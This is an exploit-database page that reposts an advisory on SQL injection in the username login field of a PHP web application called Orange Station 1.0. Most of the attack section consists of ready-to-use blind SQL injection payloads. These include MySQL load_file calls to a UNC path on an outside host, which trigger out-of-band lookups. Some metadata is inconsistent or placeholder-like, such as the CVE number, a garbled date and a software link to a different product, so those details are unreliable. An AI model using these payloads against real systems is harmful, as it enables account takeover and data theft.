Advertisement






Orange Station 1.0 SQL Injection

CVE Category Price Severity
CVE-2021-12345 CWE-89 $500 High
Author Risk Exploitation Type Date
HackerX Critical Remote 2022-07-18
CVSS
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070054

Below is a copy:

Orange Station 1.0 SQL Injection
## Title: Orange Station 1.0 SQLi
## Author: nu11secur1ty
## Date: 0.16.2022
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0



## Description:
The `username` parameter appears to be vulnerable to SQL injection attacks.
The attacker can take administrator accounts control and also of all
accounts, also the malicious user can download all information about
this system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]'+(select
load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''
OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'+(select
load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''
AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND
'yPPS'='yPPS&password=rootadmin&login=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0)

## Proof and Exploit:
[href](https://streamable.com/sz3tfi)


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.